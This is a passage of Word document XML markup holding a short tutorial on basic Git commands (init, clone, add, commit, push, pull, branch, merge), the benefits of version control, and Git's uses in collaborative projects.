          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Basic Git Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A281D" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git init</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initializes a new Git repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0021A626" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Clones an existing repository to your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFA977" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">git add </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stages changes (prepares them to be committed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764513C5" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git commit -m "message"</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commits the changes with a descriptive message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314571D" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git push</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pushes local commits to a remote repository (e.g., GitHub, GitLab).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5ED8C3" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetches and merges changes from a remote repository into your local repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE99E4" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git branch</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists, creates, or deletes branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70528CA1" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git merge</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Merges changes from one branch into another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E9DD4C" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Benefits of Using Version Control (Git):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB7A2A" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers can work together on the same codebase without overwriting each other’s changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA50A8" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>History</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every change made is recorded, allowing you to track who changed what and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21252E1A" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Backup</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git keeps a complete history, and in case of issues, you can always revert to a previous state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6652AB" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Branching</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers can work on isolated branches for new features or bug fixes without affecting the main codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E3EF1" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Code Review</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git helps in facilitating code reviews by providing the tools to compare changes, view history, and manage pull requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30416EB5" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use of Git in Projects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940D059" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collaborative Development</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple developers can work on different parts of the project simultaneously and merge their changes easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2685C1D2" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tracking Changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a detailed history of code changes, which helps in debugging and understanding the evolution of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746966CF" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Managing Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git helps in versioning software releases and tracking changes in each version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A0505" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In conclusion, Git is essential for modern software development, especially in collaborative environments where many developers are working on the same project. It streamlines the process of managing changes, collaborating efficiently, and maintaining project history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D5086" w14:textId="3E2D6373" w:rsidR="000C6CF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000C6CF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982135A">
          <v:rect id="_x0000_i3337" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20FD19" w14:textId="77777777" w:rsidR="00AE3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE3A76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="827" w:name="_Toc196308307"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to push and commit code in git using commands?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="827"/>
    </w:p>
    <w:p w14:paraId="30C32F7D" w14:textId="17F28776" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
